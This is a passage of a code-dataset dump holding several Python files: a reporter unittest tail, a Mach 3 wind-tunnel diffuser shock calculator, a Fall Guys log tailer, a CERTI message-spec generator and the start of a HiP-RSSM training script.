primary_task_id, \"format\": \"csv\", \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n secondary_task_id = reply.json['task_id']\n self.wait_tasks_ready([secondary_task_id])\n reply = fsmRequests.getDoneTask(secondary_task_id)\n self.assertEqual(reply.statusCode, 200, 'Wrong report status_code, json: \"{}\"'.format(reply.json))\n self.assertEqual(reply.json['result']['errors']['errors'][0],\n {'detail': 'Result generator is not implemented yet', 'error_code': 15006})\n\n def test_wrong_format(self):\n cross_match_task_id = self.cross_match_task_ids['descriptors_to_descriptors']\n reply = fsmRequests.createTaskReporter({\"task_id\": cross_match_task_id, \"format\": \"jpeg\", \"parameters\": {\n \"save_portraits\": 1\n }, \"description\": self.name})\n self.assertEqual(reply.statusCode, 400)\n self.assertEqual(reply.json, {\n 'error_code': 12019,\n 'detail': \"Failed to validate input json. Path: 'format', message: ''jpeg' is not one of ['pdf', 'csv']'\"\n })\n\n # todo @skipIf(USE_LATEX, \"Latex enabled\")\n def test_forbidden_without_latex(self):\n if USE_LATEX:\n return\n reply = fsmRequests.createTaskReporter({\"task_id\": 777, \"format\": \"pdf\"})\n self.assertEqual(403, reply.statusCode, \"Got wrong status code\")\n self.assertDictEqual(\n {\"error_code\": 12025, \"detail\": \"LaTeX is disabled according to the current configuration\"},\n reply.json,\n \"Wrong error description\"\n )\n\n def test_additional_fields(self):\n perfect_task = {\n \"task_id\": 1011,\n \"format\": \"pdf\",\n \"parameters\": {\n \"colors_bounds\": {\n \"green\": 0.1,\n \"orange\": 0.2,\n \"red\": 0.3\n }\n },\n \"description\": self.name\n }\n self.corrupt_test(perfect_task, ('', 'parameters', 'parameters.colors_bounds'), fsmRequests.createTaskReporter)\n\n def test_location(self):\n reply = fsmRequests.createTaskReporter({\"task_id\": self.clusterizer_task_ids['descriptors'], \"format\": \"csv\",\n \"description\": self.name})\n self.assertEqual(202, reply.statusCode, reply.json)\n task_id = reply.json['task_id']\n self.wait_tasks_ready([task_id])\n done_task = fsmRequests.getDoneTask(task_id)\n self.assertEqual('/api/{}/reports/{}'.format(FSM2_API_VERSION, task_id),\n done_task.headers['Location'])\n","repo_name":"qonteo/luna","sub_path":"fsm2_linux_rel_v.2.0.0/tests/system_tests/unittests_reporter.py","file_name":"unittests_reporter.py","file_ext":"py","file_size_in_byte":22159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42015734903","text":"import numpy as np\r\nfrom GENozzle import GENozzle\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Define Constant Values\r\nk = 1.4\r\nR_air = 287.058 # J/kgK\r\n\r\nDataTable = pd.DataFrame(index=['M', 'Mns', 'T0', 'T', 'P0', 'P', 'Delta', 'Beta', 'Phi'],\r\n columns=['1', '2', '3', '4', '5', '6', '7', '8', '9', '10'])\r\n\r\n\r\n\r\ndef beta2(delta, mach, n):\r\n # n = 0 for weak oblique shock, n = 1 for strong shock\r\n mu = np.arcsin(1 / mach) # Mach wave angle\r\n b = -(((mach**2 + 2)/(mach**2)) + k*(np.sin(delta))**2)\r\n c = ((2*mach**2 + 1)/(mach**4)) + ((k+1)**2/(4) + (k-1)/(mach**2))*(np.sin(delta))**2\r\n d = -(np.cos(delta)**2/mach**4)\r\n v = (3*d - b**2)/9\r\n w = (9*b*c - 27*d - 2*b**2)/54\r\n D = v**3 + w**2\r\n phi = (1/3)*(np.arctan(np.sqrt(-D)/w))\r\n x_s = -b/3 + 2*np.sqrt(-v)*np.cos(phi)\r\n x_w = -b/3 - np.sqrt(-v)*(2*np.sqrt(-v)*np.cos(phi))\r\n \r\n if n == 0:\r\n B = np.arctan(np.sqrt(x_w/(1-x_w)))\r\n elif n == 1:\r\n B = 
np.arctan(np.sqrt(x_s/(1-x_s)))\r\n return B\r\n\r\n \r\n# Delta-Beta-Mach Relation functions\r\ndef delta(beta, mach):\r\n delt = np.arctan(2*np.cot(beta)*((mach**2*(np.sin(beta)**2) - 1)/(mach**2*(k + 2*np.cos(2*beta) + 2))))\r\n return delt\r\n\r\n\r\ndef beta(delt, mach, n):\r\n # n = 0 for weak oblique shock, n = 1 for strong shock\r\n mu = np.arcsin(1 / mach) # Mach wave angle\r\n c = np.tan(mu) ** 2\r\n a = ((k - 1) / 2 + (k + 1) * c / 2) * np.tan(delt)\r\n b = ((k + 1) / 2 + (k + 3) * c / 2) * np.tan(delt)\r\n d = np.sqrt(4 * (1 - 3 * a * b) ** 3 / ((27 * a ** 2 * c + 9 * a * b - 2) ** 2) - 1)\r\n Beta = np.arctan((b + 9 * a * c) / (2 * (1 - 3 * a * b)) - (d * (27 * a ** 2 * c + 9 * a * b - 2)) / (\r\n 6 * a * (1 - 3 * a * b)) * np.tan(n * np.pi / 3 + 1 / 3 * np.arctan(1 / d)))\r\n return Beta\r\n\r\n\r\n# Isentropic expansion ratio functions\r\ndef ToTt(k, M):\r\n return (1 + ((k-1)/2)*M**2)**-1\r\n\r\n\r\ndef PoPt(k, M):\r\n return (1 + ((k-1)/2)*M**2)**(-k/(k-1))\r\n\r\n\r\ndef rhoorhot(k, M):\r\n return (1 + ((k-1)/2)*M**2)**(-1/(k-1))\r\n\r\n\r\ndef AoAt(k, M):\r\n return (((k+1)*0.5)**(-(k+1)/(2*(k-1))))*((1 + ((k-1)*0.5)*M**2)**((k+1)/(2*(k-1)))/M)\r\n\r\n\r\ndef P2oP1(k, M):\r\n return (2*k*M**2 - (k - 1))/(k + 1)\r\n\r\n\r\ndef rho2orho1(k, M):\r\n return ((k+1)*M**2)/((k - 1)*M**2 + 2)\r\n\r\n\r\ndef T2oT1(k, M):\r\n return ((2*k*M**2 - (k - 1))*((k - 1)*M**2 + 2))/((k+1)**2*M**2)\r\n\r\n\r\ndef Mach2(k, M):\r\n return ((k-1)*M**2 + 2)/(2*k*M**2 - (k-1))\r\n\r\n\r\ndef Pt20Pt1(k, M):\r\n return (((k+1)*M**2)/((k-1)*M**2 + 2))**(k/(k-1))*((k+1)/(2*k*M**2 - (k-1)))**(1/(k-1))\r\n\r\nMe = 3\r\nT1 = 225 #K\r\nP1 = 3.5 # Kpa\r\nk = 1.4\r\nrho1 = 0.0542 # kg/m3\r\n# Me = 5\r\n# T1 = 154 #K\r\n# P1 = 3.0 # Kpa\r\n# k = 1.4\r\n# rho1 = 0.0679 # kg/m3\r\n# Me = 7\r\n# T1 = 86 #K\r\n# P1 = 1.5 # Kpa\r\n# k = 1.4\r\n# rho1 = 0.0608 # kg/m3\r\n# Me = 10\r\n# T1 = 50 #K\r\n# P1 = 0.5 # Kpa\r\n# k = 1.4\r\n# rho1 = 0.0348 # kg/m3\r\na1 = np.sqrt(k*R_air*T1)\r\nv = Me*a1\r\np01 = (P1*1000 + 0.5*rho1*v**2)/1000\r\ndelt = np.deg2rad(9)\r\n\r\nDataTable.at['Delta', '1'] = np.rad2deg(delt)\r\nDataTable.at['P', '1'] = P1\r\nDataTable.at['P0', '1'] = p01\r\nDataTable.at['T', '1'] = T1\r\nDataTable.at['M', '1'] = Me\r\n\r\n\r\n\r\n\r\n\r\n# Generate Mach 3 Nozzle using GE nozzle class\r\nmesh_size = 75\r\nradius_of_expansion = 1.4\r\nNozzle = GENozzle(k, Me, mesh_size, radius_of_expansion)\r\n# Test section height and width\r\ntest_section_h_w = 1.9860 # m\r\n# Test section length\r\ntest_section_length = 2.286\r\n# get nozzle scaled throat height\r\nthroat_height = Nozzle.get_scaled_throat_height(test_section_h_w)\r\n# Get nozzle points scaled to exit height\r\nxnozz, ynozz = Nozzle.scale_wall_points(test_section_h_w)\r\n# second throat height\r\nthroat2_height = throat_height/Pt20Pt1(1.4, Me) # m\r\n\r\nplt.figure()\r\nplt.axis('equal')\r\nplt.grid()\r\nplt.title('Mach 3 Wind Tunnel')\r\n# plot the nozzle upper and lower contours\r\nplt.plot(xnozz, -ynozz)\r\n#plot the test section walls\r\nplt.hlines(-ynozz[-1], xnozz[-1], xnozz[-1]+test_section_length)\r\n\r\n# Save endpoints of test section walls\r\ny0 = ynozz[-1]\r\nx0 = xnozz[-1]+test_section_length\r\n\r\n\r\n# Normal Shock at Mach 3 to get rough estimate for throat2 height\r\nNS_relation = Pt20Pt1(1.4, Me)\r\n\r\n# Calculate the height from the 'floor' to the bottom of the second throat\r\nh2 = 0.5*test_section_h_w - 0.5*throat2_height\r\n# Use that length and the wedge angle to find the length of the wedge section\r\nL2 = 
h2/np.tan(delt)\r\n# Plot the diffuser wedges\r\n# x0, y0 = 0, 0\r\ny1 = y0-h2\r\nx1 = x0 + L2\r\n# Plot the converging diffuser sections\r\nplt.plot([x0, x0 + L2], [-y0, -y0 + h2])\r\n\r\n# Calculate the first shockwaves\r\nbeta1 = beta(delt, Me, 0)\r\nDataTable.at['Beta', '1'] = np.rad2deg(beta1)\r\n# Calculate the new properties across the first oblique shock, lower side\r\n# Calculate the normal mach number\r\nM1NS = Me*np.sin(beta1)\r\nDataTable.at['Mns', '1'] = M1NS\r\n# Mach number behind shock\r\nM2 = Mach2(k, M1NS)/np.sin(beta1-delt)\r\nDataTable.at['M', '2'] = M2\r\n# Pressure and Temperature behind shock\r\nP2 = P2oP1(k, M1NS)*P1\r\nT2 = T2oT1(k, M1NS)*T1\r\nDataTable.at['P', '2'] = P2\r\nDataTable.at['T', '2'] = T2\r\n# Total Pressure and temperature behind shock\r\np02 = ( Pt20Pt1(k, M1NS)/PoPt(k, Me))*P1\r\nT02 = T1/ToTt(k, Me)\r\nDataTable.at['P0', '2'] = p02\r\nDataTable.at['T0', '2'] = T02\r\n# Delta stays the same\r\nDataTable.at['Delta', '2'] = np.rad2deg(delt)\r\n# Calculate the angle of the first oblique shock\r\nLS23 = (0.5*test_section_h_w)/np.tan(beta1)\r\n# find the point at which the shocks interact\r\nyA = 0\r\nxA = x0 + LS23\r\n# Plot the initial oblique shocks\r\nplt.plot([x0, xA], [-y0, yA], linestyle='dashed')\r\n\r\n\r\n\r\n\r\n# Section 2 to 3\r\n# Beta for the first shock reflection (shock going back down)\r\nbeta2 = beta(delt, M2, 0)\r\nDataTable.at['Beta', '2'] = np.rad2deg(beta2)\r\n# Normal mach number\r\nM2NS = M2*np.sin(beta2)\r\nDataTable.at['Mns', '2'] = M2NS\r\n# Mach number behind shock\r\nM3 = Mach2(k, M2NS)/np.sin(beta2-delt)\r\nDataTable.at['M', '3'] = M3\r\n# Calculate temp and pressure after the shock\r\nP3 = P2oP1(k, M2NS)*P2\r\nT3 = T2oT1(k, M2NS)*T2\r\nDataTable.at['P', '3'] = P3\r\nDataTable.at['T', '3'] = T3\r\n# Total temp and pressure after shock\r\np03 = (Pt20Pt1(k, M2NS)/PoPt(k, M2))*P2\r\nT03 = T1/ToTt(k, M2)\r\nDataTable.at['P0', '3'] = p03\r\nDataTable.at['T0', '3'] = T03\r\n# Angle that shock makes with the centerline\r\nPHI2 = beta2-delt\r\nDataTable.at['Phi', '2'] = np.rad2deg(PHI2)\r\n# Plot second shock wave\r\ny3 = -y0\r\nx3 = xA + (0.5*throat2_height)/np.tan(PHI2)\r\nplt.plot([xA, x3], [0, -y1], linestyle='dashed')\r\n# Delta angle stays the same\r\nDataTable.at['Delta', '3'] = np.rad2deg(delt)\r\n\r\n\r\n\r\n\r\n# Section 3 to 4 ( third shock wave, reflection back up\r\nbeta3 = beta(0.01, M3, 0)\r\nDataTable.at['Beta', '3'] = np.rad2deg(beta3)\r\n# Normal mach number\r\nM3NS = M3*np.sin(beta3)\r\nDataTable.at['Mns', '3'] = M3NS\r\n# Mach number after shock\r\nM4 = Mach2(k, M3NS)/np.sin(beta3)\r\nDataTable.at['M', '4'] = M4\r\n# Temp and pressure after shock\r\nP4 = P2oP1(k, M3NS)*P3\r\nT4 = T2oT1(k, M3NS)*T3\r\nDataTable.at['P', '4'] = P4\r\nDataTable.at['T', '4'] = T4\r\n# total temp and pressure after shock\r\np04 = (Pt20Pt1(k, M3NS)/PoPt(k, M3))*P3\r\nT04 = T1/ToTt(k, M3)\r\nDataTable.at['P0', '4'] = p04\r\nDataTable.at['T0', '4'] = T04\r\n# angle shock makes with lower wall\r\nPHI3 = beta3\r\nDataTable.at['Phi', '3'] = np.rad2deg(PHI3)\r\n# Plot shock\r\nx4 = x3 + (0.5*throat2_height)/np.tan(PHI3)\r\nplt.plot([x3, x4], [-y1, 0], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '4'] = 0\r\n\r\n\r\n# Section 4 to 5 ( Fourth shock wave, reflection down again)\r\nbeta4 = beta(0.01, M4, 0)\r\nDataTable.at['Beta', '4'] = np.rad2deg(beta4)\r\n# Normal mach number\r\nM4NS = M4*np.sin(beta4)\r\nDataTable.at['Mns', '4'] = M4NS\r\n# Mach number after shock\r\nM5 = Mach2(k, 
M4NS)/np.sin(beta4)\r\nDataTable.at['M', '5'] = M5\r\n# Temp and pressure after shock\r\nP5 = P2oP1(k, M4NS)*P4\r\nT5 = T2oT1(k, M4NS)*T4\r\nDataTable.at['P', '5'] = P5\r\nDataTable.at['T', '5'] = T5\r\n# total temp and pressure after shock\r\np05 = (Pt20Pt1(k, M4NS)/PoPt(k, M4))*P4\r\nT05 = T1/ToTt(k, M4)\r\nDataTable.at['P0', '5'] = p05\r\nDataTable.at['T0', '5'] = T05\r\n# angle shock makes with lower wall\r\nPHI4 = beta4\r\nDataTable.at['Phi', '4'] = np.rad2deg(PHI4)\r\n# Plot shock\r\nx5 = x4 + (0.5*throat2_height)/np.tan(PHI4)\r\nplt.plot([x4, x5], [0, -y1], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '5'] = 0\r\n\r\n\r\n\r\n# Section 5 to 6 ( Fifth shock wave, reflection up again)\r\nbeta5 = beta(0.01, M5, 0)\r\nDataTable.at['Beta', '5'] = np.rad2deg(beta5)\r\n# Normal mach number\r\nM5NS = M5*np.sin(beta5)\r\nDataTable.at['Mns', '5'] = M5NS\r\n# Mach number after shock\r\nM6 = Mach2(k, M5NS)/np.sin(beta5)\r\nDataTable.at['M', '6'] = M6\r\n# Temp and pressure after shock\r\nP6 = P2oP1(k, M5NS)*P5\r\nT6 = T2oT1(k, M5NS)*T5\r\nDataTable.at['P', '6'] = P6\r\nDataTable.at['T', '6'] = T6\r\n# total temp and pressure after shock\r\np06 = (Pt20Pt1(k, M5NS)/PoPt(k, M5))*P5\r\nT06 = T1/ToTt(k, M5)\r\nDataTable.at['P0', '6'] = p06\r\nDataTable.at['T0', '6'] = T06\r\n# angle shock makes with lower wall\r\nPHI5 = beta5\r\nDataTable.at['Phi', '5'] = np.rad2deg(PHI5)\r\n# Plot shock\r\nx6 = x5 + (0.5*throat2_height)/np.tan(PHI5)\r\nplt.plot([x5, x6], [-y1, 0], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '6'] = 0\r\n\r\n\r\n\r\n\r\n# Section 6 to 7 (sixth shock wave, reflection up again)\r\nbeta6 = beta(0.01, M6, 0)\r\nDataTable.at['Beta', '6'] = np.rad2deg(beta6)\r\n# Normal mach number\r\nM6NS = M6*np.sin(beta6)\r\nDataTable.at['Mns', '6'] = M6NS\r\n# Mach number after shock\r\nM7 = Mach2(k, M6NS)/np.sin(beta6)\r\nDataTable.at['M', '7'] = M7\r\n# Temp and pressure after shock\r\nP7 = P2oP1(k, M5NS)*P6\r\nT7 = T2oT1(k, M5NS)*T6\r\nDataTable.at['P', '7'] = P7\r\nDataTable.at['T', '7'] = T7\r\n# total temp and pressure after shock\r\np07 = (Pt20Pt1(k, M6NS)/PoPt(k, M6))*P6\r\nT07 = T1/ToTt(k, M6)\r\nDataTable.at['P0', '7'] = p07\r\nDataTable.at['T0', '7'] = T07\r\n# angle shock makes with lower wall\r\nPHI6 = beta6\r\nDataTable.at['Phi', '6'] = np.rad2deg(PHI6)\r\n# Plot shock\r\nx7 = x6 + (0.6*throat2_height)/np.tan(PHI6)\r\nplt.plot([x6, x7], [0, -y1], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '7'] = 0\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Section 7 to 8 ( seventh shock wave, reflection up again)\r\nbeta7 = beta(0.01, M7, 0)\r\nDataTable.at['Beta', '7'] = np.rad2deg(beta7)\r\n# Normal mach number\r\nM7NS = M7*np.sin(beta7)\r\nDataTable.at['Mns', '7'] = M7NS\r\n# Mach number after shock\r\nM8 = Mach2(k, M7NS)/np.sin(beta7)\r\nDataTable.at['M', '8'] = M8\r\n# Temp and pressure after shock\r\nP8 = P2oP1(k, M5NS)*P7\r\nT8 = T2oT1(k, M5NS)*T7\r\nDataTable.at['P', '8'] = P8\r\nDataTable.at['T', '8'] = T8\r\n# total temp and pressure after shock\r\np08 = (Pt20Pt1(k, M7NS)/PoPt(k, M7))*P7\r\nT08 = T1/ToTt(k, M7)\r\nDataTable.at['P0', '8'] = p08\r\nDataTable.at['T0', '8'] = T08\r\n# angle shock makes with lower wall\r\nPHI7 = beta7\r\nDataTable.at['Phi', '7'] = np.rad2deg(PHI7)\r\n# Plot shock\r\nx8 = x7 + (0.7*throat2_height)/np.tan(PHI7)\r\nplt.plot([x7, x8], [-y1, 0], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '8'] = 0\r\n\r\n\r\n\r\n\r\n# Section 8 to 9 ( eighth shock wave, reflection up 
again)\r\nbeta8 = beta(0.01, M8, 0)\r\nDataTable.at['Beta', '8'] = np.rad2deg(beta8)\r\n# Normal mach number\r\nM8NS = M8*np.sin(beta8)\r\nDataTable.at['Mns', '8'] = M8NS\r\n# Mach number after shock\r\nM9 = Mach2(k, M8NS)/np.sin(beta8)\r\nDataTable.at['M', '9'] = M9\r\n# Temp and pressure after shock\r\nP9 = P2oP1(k, M5NS)*P8\r\nT9 = T2oT1(k, M5NS)*T8\r\nDataTable.at['P', '9'] = P9\r\nDataTable.at['T', '9'] = T9\r\n# total temp and pressure after shock\r\np09 = (Pt20Pt1(k, M8NS)/PoPt(k, M8))*P8\r\nT09 = T1/ToTt(k, M8)\r\nDataTable.at['P0', '9'] = p09\r\nDataTable.at['T0', '9'] = T09\r\n# angle shock makes with lower wall\r\nPHI8 = beta8\r\nDataTable.at['Phi', '8'] = np.rad2deg(PHI8)\r\n# Plot shock\r\nx9 = x8 + (0.8*throat2_height)/np.tan(PHI8)\r\nplt.plot([x8, x9], [0, -y1], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '9'] = 0\r\n\r\n\r\n\r\n\r\n# Section 9 to 10 ( Ninth shock wave, reflection up again)\r\nbeta9 = beta(0.01, M9, 0)\r\nDataTable.at['Beta', '9'] = np.rad2deg(beta9)\r\n# Normal mach number\r\nM9NS = M9*np.sin(beta9)\r\nDataTable.at['Mns', '9'] = M9NS\r\n# Mach number after shock\r\nM10 = Mach2(k, M9NS)/np.sin(beta9)\r\nDataTable.at['M', '10'] = M10\r\n# Temp and pressure after shock\r\nP10 = P2oP1(k, M5NS)*P9\r\nT10 = T2oT1(k, M5NS)*T9\r\nDataTable.at['P', '10'] = P10\r\nDataTable.at['T', '10'] = T10\r\n# total temp and pressure after shock\r\np010 = (Pt20Pt1(k, M9NS)/PoPt(k, M9))*P9\r\nT010 = T1/ToTt(k, M9)\r\nDataTable.at['P0', '10'] = p010\r\nDataTable.at['T0', '10'] = T010\r\n# angle shock makes with lower wall\r\nPHI9 = beta9\r\nDataTable.at['Phi', '9'] = np.rad2deg(PHI9)\r\n# Plot shock\r\nx10 = x9 + (0.9*throat2_height)/np.tan(PHI9)\r\nplt.plot([x9, x10], [-y1, 0], linestyle='dashed')\r\n# Delta stays the same\r\nDataTable.at['Delta', '10'] = 0\r\n\r\nplt.hlines(0, 0, x10, color='k')\r\nplt.hlines((-y0 + h2), x1, x10, color='k')\r\n\r\n\r\n\r\nprint(DataTable)\r\n\r\n\r\n########## Plot the full diffuser ##################\r\nplt.figure()\r\ny0 = ynozz[-1]\r\nx0 = 0\r\nx1 = x0 + L2\r\n# Plot the converging diffuser section\r\nplt.plot([x0, x1], [-y0, -y0 + h2], color='k')\r\nplt.plot([x0, x1], [y0, y0 - h2], color='k')\r\n\r\n\r\n#plot the first oblique shock\r\nxA = x0 + LS23\r\nplt.plot([x0, xA], [-y0, yA], linestyle='dashed')\r\nplt.plot([x0, xA], [y0, yA], linestyle='dashed')\r\n\r\n# Plot the second oblique shock\r\nx3 = xA + (0.5*throat2_height)/np.tan(PHI2)\r\nplt.plot([xA, x3], [0, -y1], linestyle='dashed')\r\nplt.plot([xA, x3], [0, y1], linestyle='dashed')\r\n\r\n# Plot the third oblique shock\r\nx4 = x3 + (0.5*throat2_height)/np.tan(PHI3)\r\nplt.plot([x3, x4], [-y1, yA], linestyle='dashed')\r\nplt.plot([x3, x4], [y1, yA], linestyle='dashed')\r\n\r\n# Plot the fourth oblique shock\r\nx5 = x4 + (0.5*throat2_height)/np.tan(PHI4)\r\nplt.plot([x4, x5], [yA, -y1], linestyle='dashed')\r\nplt.plot([x4, x5], [yA, y1], linestyle='dashed')\r\n\r\n# Plot the fifth oblique shock\r\nx6 = x5 + (0.5*throat2_height)/np.tan(PHI5)\r\nplt.plot([x5, x6], [-y1, yA], linestyle='dashed')\r\nplt.plot([x5, x6], [y1, yA], linestyle='dashed')\r\n\r\n# Plot the sixth oblique shock\r\nx7 = x6 + (0.5*throat2_height)/np.tan(PHI6)\r\nplt.plot([x6, x7], [yA, -y1], linestyle='dashed')\r\nplt.plot([x6, x7], [yA, y1], linestyle='dashed')\r\n\r\n# Plot the seventh oblique shock\r\nx8 = x7 + (0.5*throat2_height)/np.tan(PHI7)\r\nplt.plot([x7, x8], [-y1, yA], linestyle='dashed')\r\nplt.plot([x7, x8], [y1, yA], linestyle='dashed')\r\n\r\n# Plot the eigth oblique 
shock\r\nx9 = x8 + (0.5*throat2_height)/np.tan(PHI8)\r\nplt.plot([x8, x9], [yA, -y1], linestyle='dashed')\r\nplt.plot([x8, x9], [yA, y1], linestyle='dashed')\r\n\r\n# Plot the Ninth oblique shock\r\nx10 = x9 + (0.5*throat2_height)/np.tan(PHI9)\r\nplt.plot([x9, x10], [-y1, yA], linestyle='dashed')\r\nplt.plot([x9, x10], [y1, yA], linestyle='dashed')\r\n\r\n# Plot the constant area diffuser section\r\nplt.hlines((-y0 + h2), x1, x10, color='k')\r\nplt.hlines((y0 - h2), x1, x10, color='k')\r\n\r\nprint(x10)\r\n# plt.title('Mach 3 Diffuser (incomplete)')\r\n\r\n\r\nplt.show()\r\nprint()\r\n","repo_name":"matthewelmer/LANL_WT","sub_path":"Diffuser2.py","file_name":"Diffuser2.py","file_ext":"py","file_size_in_byte":14855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6018232976","text":"import time\ndef follow(thefile):\n\tthefile.seek(0,2)\n\twhile True:\n\t\tline = thefile.readline()\n\t\tif not line:\n\t\t\ttime.sleep(0.1)\n\t\t\tcontinue\n\t\tyield line\n\nif __name__ == '__main__':\n\tlogfile = open(\"C:/Users/anshu/AppData/LocalLow/Mediatonic/FallGuys_client/Player.log\",\"r\")\n\tloglines = follow(logfile)\n\tprint(\"running\")\n\tstate = None\n\tscene = None\n\tfor line in loglines:\n\t\tif \"\\\"state\\\":\" in line:\n\t\t\tstate = line.strip().split(\": \")[-1]\n\t\telif \"[ClientGameSession] NumPlayersAchievingObjective=0\" in line:\n\t\t\tstate = \"started\"\n\t\telif \"SquadManager::GetSquadScore squadId\" in line:\n\t\t\tstate = \"ended\"\n\n\t\tif \"[StateGameLoading] Loading game level scene\" in line:\n\t\t\tscene = line.split(\"scene\")[-1].strip()\n\t\t# if \"squad\" in line:\n\t\tprint(\"state\",state,\"\\t\",\"scene\",scene,\"\\t\\t\\t\",line.strip())\n\t\t\t# state started scene None 23:21:02.222: SquadManager::GetSquadScore squadId0 not found return 0","repo_name":"Anshuman-UCSB/fallen-men","sub_path":"data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19851415343","text":"import logging\nimport GenMsgAST\nimport GenMsgBase\nimport sys\n\nclass MsgSpecGenerator(GenMsgBase.CodeGenerator):\n \"\"\"\n This is a text generator for C{MessageAST}.\n \n This generator should produce almost the same output\n as the input message specification file. 
\n \"\"\"\n\n def generatorName(cls):\n return 'MsgSpec'\n\n generatorName = classmethod(generatorName)\n\n def __init__(self, MessageAST):\n super(MsgSpecGenerator, self).__init__(MessageAST, '//')\n self.logger = logging.Logger('MsgSpecGenerator')\n self.logger.setLevel(logging.ERROR)\n self.logger.addHandler(logging.StreamHandler(sys.stdout))\n self.__languageName = 'MsgSpec'\n\n def generate(\n self,\n stream,\n what,\n factoryOnly=False,\n ):\n \"\"\"\n Redefine super.generate.\n \n what is not important in this case.\n \"\"\"\n\n # Generate package\n if self.AST.hasPackage():\n self.writeComment(stream, self.AST.package)\n stream.write('package %s\\n' % self.AST.package.name)\n\n # Generate version\n if self.AST.hasVersion():\n self.writeComment(stream, self.AST.version)\n stream.write('version %d.%d\\n' % self.AST.version.number)\n\n if not factoryOnly:\n # Generate native type\n for native in self.AST.natives:\n self.writeComment(stream, native)\n stream.write('native %s {\\n' % native.name)\n self.indent()\n if native.hasRepresentation():\n stream.write(self.getIndent() + 'representation '\n + native.getRepresentation() + '\\n')\n for (k, v) in native.languages.items():\n for l in v:\n stream.write(self.getIndent() + 'language ' + k\n + ' [' + l.statement + ']\\n')\n self.unIndent()\n stream.write('}\\n')\n\n # Generate enum\n for enum in self.AST.enums:\n self.writeComment(stream, enum)\n stream.write('enum %s {\\n' % enum.name)\n first = True\n self.indent()\n for enumval in enum.values:\n if first:\n stream.write(self.getIndent() + '%s = %d, '\n % (enumval.name, enumval.value))\n first = False\n else:\n stream.write(self.getIndent() + '%s, '\n % enumval.name)\n self.writeComment(stream, enumval)\n self.unIndent()\n stream.write('''}\n\n''')\n\n # Generate message type\n for msg in self.AST.messages:\n self.writeComment(stream, msg)\n stream.write('message %s' % msg.name)\n if msg.hasMerge():\n stream.write(' : merge %s {\\n' % msg.merge.name)\n else:\n stream.write(' {\\n')\n\n for field in msg.fields:\n if isinstance(field,\n GenMsgAST.MessageType.CombinedField):\n stream.write(' combined %s {'\n % field.typeid)\n self.writeComment(stream, field)\n for cfield in field.fields:\n stream.write(' %s %s %s '\n % (cfield.qualifier,\n cfield.typeid.name, cfield.name))\n if cfield.hasDefaultValue():\n stream.write('[default=%s] '\n % cfield.defaultValue)\n self.writeComment(stream, cfield)\n stream.write(' }\\n')\n else:\n stream.write(' %s %s %s '\n % (field.qualifier, field.typeid.name,\n field.name))\n if field.hasDefaultValue():\n stream.write('[default=%s] '\n % field.defaultValue)\n self.writeComment(stream, field)\n stream.write('''}\n\n''')\n\n # Generate Factory\n if self.AST.hasFactory():\n self.writeComment(stream, self.AST.factory)\n stream.write('factory %s {\\n' % self.AST.factory.name)\n self.indent()\n if self.AST.factory.hasFactoryCreator():\n stream.write(self.getIndent() + 'factoryCreator %s %s(%s)\\n'\n % self.AST.factory.creator)\n if self.AST.factory.hasFactoryReceiver():\n stream.write(self.getIndent()\n + 'factoryReceiver %s %s(%s)\\n'\n % self.AST.factory.receiver)\n self.unIndent()\n stream.write('''}\n\n''')\n","repo_name":"etopzone/CERTI","sub_path":"scripts/GenMsgSpec.py","file_name":"GenMsgSpec.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"37"} +{"seq_id":"40951393421","text":"import sys\nsys.path.append('.')\nfrom omegaconf import DictConfig, OmegaConf\nimport 
hydra\nimport os\n\nimport torch\nimport wandb\n\nfrom data.mobileDataSeq import metaMobileData\nfrom metaWorldModels.hiprssm import HipRSSM\nfrom learning import hiprssm_dyn_trainer\nfrom inference import hiprssm_dyn_inference\nfrom utils.metrics import root_mean_squared\n\nnn = torch.nn\n\n\ndef generate_mobile_robot_data_set(data):\n train_windows, test_windows = data.train_windows, data.test_windows\n\n train_targets = train_windows['target']\n test_targets = test_windows['target']\n\n train_obs = train_windows['obs']\n test_obs = test_windows['obs']\n\n train_task_idx = train_windows['task_index']\n test_task_idx = test_windows['task_index']\n\n train_act = train_windows['act']\n test_act = test_windows['act']\n print(test_act.shape, train_act.shape)\n\n return torch.from_numpy(train_obs).float(), torch.from_numpy(train_act).float(), torch.from_numpy(train_targets).float(), torch.from_numpy(train_task_idx).float(),\\\n torch.from_numpy(test_obs).float(), torch.from_numpy(test_act).float(), torch.from_numpy(test_targets).float(), torch.from_numpy(test_task_idx).float()\n\n@hydra.main(config_path='conf',config_name='config')\ndef my_app(cfg)->OmegaConf:\n global config\n model_cfg = cfg.model\n exp = Experiment(model_cfg)\n\n\nclass Experiment():\n def __init__(self, cfg):\n self.global_cfg = cfg\n self._experiment()\n\n\n def _experiment(self):\n \"\"\"Data\"\"\"\n cfg = self.global_cfg\n torch.cuda.empty_cache()\n\n tar_type = cfg.data_reader.tar_type # 'delta' - if to train on differences to current states\n # 'next_state' - if to trian directly on the next states\n\n ### Load Data Here\n data = metaMobileData(cfg.data_reader)\n train_obs, train_act, train_targets, train_task_idx, test_obs, test_act, test_targets, test_task_idx = generate_mobile_robot_data_set(\n data) # If your dataset do not have actions you can set them as zero for now, I will update the code for datasets with unactuated dynamcis\n\n ####\n impu = cfg.data_reader.imp\n save_path = os.getcwd() + '/experiments/saved_models/' + cfg.wandb.exp_name + '.ckpt'\n\n ##### Define WandB Stuffs\n expName = cfg.wandb.exp_name\n if cfg.wandb.log:\n mode = \"online\"\n else:\n mode = \"disabled\"\n\n 